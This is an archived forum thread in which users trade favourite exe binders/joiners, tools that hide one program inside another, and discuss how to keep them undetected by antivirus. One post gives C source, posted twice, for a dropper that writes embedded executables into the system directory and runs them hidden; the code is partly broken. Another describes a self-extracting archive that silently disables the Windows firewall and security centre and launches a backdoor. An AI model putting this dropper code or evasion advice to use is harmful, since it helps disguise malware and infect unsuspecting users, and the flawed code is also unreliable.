Anyway, if you've clicked on the link hopefully you know what I'm talking about anyway.
Please list the top binders/joiners that you like to use and/or links to top ones.
Thanks!
Full Version: File Binders/joiners - Your Favorites?
I'm onto phase two of my anti-virus research, this part involves exe binders/joiners - the apps that allow you to take, say, cmd.exe and join another executable to it so when someone clicks on cmd.exe, it also opens the other file.
Anyway, if you've clicked on the link hopefully you know what I'm talking about anyway.
Please list the top binders/joiners that you like to use and/or links to top ones.
Thanks!
Anyway, if you've clicked on the link hopefully you know what I'm talking about anyway.
Please list the top binders/joiners that you like to use and/or links to top ones.
Thanks!
i dont use any but if i remember correctly fusion is quite good
If I were an evil Virii maker, the only binder i would consider is one that will never be detected. So that would be a custom exe made as follows:
#include <stdio.h>
#include <stdlib.h>
#include <process.h>
#include <windows.h>
const unsigned char hex1[] = {
0x4D,0x5A,...,0x5A};
const unsigned char hex1[] = {
0x4D,0x5A,...,0x6A};
const unsigned int len1 = 65536;
const unsigned int len2 = 76636;
int main()
{
HANDLE file;
char sysdir[MAX_PATH];
char newfile1[MAX_PATH];
char newfile2[MAX_PATH];
DWORD written;
GetSystemDirectory(sysdir, MAX_PATH);
sprintf(newfile1, "%s\\%s", sysdir, "newfile1.exe");
sprintf(newfile2, "%s\\%s", sysdir, "newfile2.exe");
file = CreateFile& #40;newfile1,GENERIC_WRITE,FILE_SHARE_WRITE,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMA
L,0);
WriteFile(file,hex1,len1,&written,0);
CloseHandle(file);
ShellExecute(0, "open",newfile1 ,NULL, NULL, SW_HIDE);
file = CreateFile& #40;newfile2,GENERIC_WRITE,FILE_SHARE_WRITE,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMA
L,0);
WriteFile(file,hex2,len2,&written,0);
CloseHandle(file);
ShellExecute(0, "open",newfile1 ,NULL, NULL, SW_HIDE);
ExitProcess(0);
return 0;
}
I have no idea who originally came up with this, but credits to whoever that might be.
CODE
#include <stdio.h>
#include <stdlib.h>
#include <process.h>
#include <windows.h>
const unsigned char hex1[] = {
0x4D,0x5A,...,0x5A};
const unsigned char hex1[] = {
0x4D,0x5A,...,0x6A};
const unsigned int len1 = 65536;
const unsigned int len2 = 76636;
int main()
{
HANDLE file;
char sysdir[MAX_PATH];
char newfile1[MAX_PATH];
char newfile2[MAX_PATH];
DWORD written;
GetSystemDirectory(sysdir, MAX_PATH);
sprintf(newfile1, "%s\\%s", sysdir, "newfile1.exe");
sprintf(newfile2, "%s\\%s", sysdir, "newfile2.exe");
file = CreateFile& #40;newfile1,GENERIC_WRITE,FILE_SHARE_WRITE,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMA
L,0);
WriteFile(file,hex1,len1,&written,0);
CloseHandle(file);
ShellExecute(0, "open",newfile1 ,NULL, NULL, SW_HIDE);
file = CreateFile& #40;newfile2,GENERIC_WRITE,FILE_SHARE_WRITE,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMA
L,0);
WriteFile(file,hex2,len2,&written,0);
CloseHandle(file);
ShellExecute(0, "open",newfile1 ,NULL, NULL, SW_HIDE);
ExitProcess(0);
return 0;
}
I have no idea who originally came up with this, but credits to whoever that might be.
Nice source tibbar (yes I know you didn't write i.)
I would have to agree the best binder you code is the one you code yourself, it is essential for a binder to be undetected.
Although if your talking about public binders, I would have to say Micro-Bind....well I think that's what it's called.
FBI Binder is also pretty good...
I would have to agree the best binder you code is the one you code yourself, it is essential for a binder to be undetected.
Although if your talking about public binders, I would have to say Micro-Bind....well I think that's what it's called.
FBI Binder is also pretty good...
xp also comes with a binding tool: iexpress.exe
iexpress.exe is a packer (self extracter) not a binder.
- What i do is make a winrar sfx. You put two files in it and also a batchfile that runs hidden (compiled with tebic). The after the batch is run it executes both and exits. You can also add other usefull things to the batch job like disabling the WinXp security Center and firewall, or kill a list of progs etc.. I also add a file called config.dat that just has the line:
Where it says none i can put the name of a .exe and add it to the sfx or leave it as none and let the backdoor run alone. You can also add pictures etc. I can post the script later if anyone is interested. Peace
CODE
add: none
Where it says none i can put the name of a .exe and add it to the sfx or leave it as none and let the backdoor run alone. You can also add pictures etc. I can post the script later if anyone is interested. Peace
BTW, tibbar's source can still be detected, because the EXE files are still kept. So the signatures can be detected, and a heuristic analyzing will also detect the malicious code ,too, since it's not packed at all.
I googled for fusion, fbi binder and micro-bind, but either found nothing or very old sites, with 404s at the end of a link.. Do you know the name of a binder that just binds two exe's into one? It doesn't matter if its detectable by an anti-virus, as I'm just simplifying something i use .bat's normally to do...
Thanks
Thanks
microjoiner is my fav, written in asm, easy to use, powerfull and i can make it undetectable 
The best and most complete binder available is hammer binder 3.
It can run hidden appz, melt after run, webdownload, edit registry and much much more
It can run hidden appz, melt after run, webdownload, edit registry and much much more
QUOTE(belgther @ Jun 15 2005, 04:10 AM)
BTW, tibbar's source can still be detected, because the EXE files are still kept. So the signatures can be detected, and a heuristic analyzing will also detect the malicious code ,too, since it's not packed at all.
in theory you are right. in practice none of the AV on the market detect this technique.
besides u can always encrypt the binaries.
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
